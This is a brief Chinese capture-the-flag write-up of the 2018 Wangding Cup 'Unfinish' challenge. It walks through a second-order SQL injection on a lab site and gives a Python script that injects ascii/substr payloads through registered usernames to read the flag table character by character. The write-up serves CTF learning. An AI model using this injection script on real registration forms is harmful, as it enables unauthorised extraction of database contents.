[网鼎杯2018]Unfinish
熟悉的二次注入:
是sql注入题目:
常见的目录规则,让人想起register.php,扫描目录也扫出来了:
注册:
登录进去,搜寻信息:
用户名被显示出来,试试二次注入:
注册用户名 '1’and’0
确实存在,自己写脚本去爆吧:
注册发包的格式:(如上图)
写脚本要提取出该用户名的内容:
url =' http://e216dce0-dd95-4585-90a3-b0d9f3963582.node3.buuoj.cn/'
flag =''
url_login = url + 'login.php'
url_register = url + 'register.php'
url_index = url +'index.php'
for i in range(100):
sleep(0.2)
data_reg = {"email":"8888{}@qq.com".format(i),"username":"0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}
data_log = {"email" : "8888{}@qq.com".format(i), "password" : "123"}
r1=requests.post(url_register,data=data_reg)
r2=requests.post(url_login,data=data_log)
#r3=requests.get(url_index)
res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)
res1 = re.search(r'\d+', res.group())
flag = flag+chr(int(res1.group()))
print(flag)
\s提取空格,\d提取所有数字,\d+则提取出第一个数字,group()只输出其数据,输出的是ASCLL码形式,转换一下在拼在一起: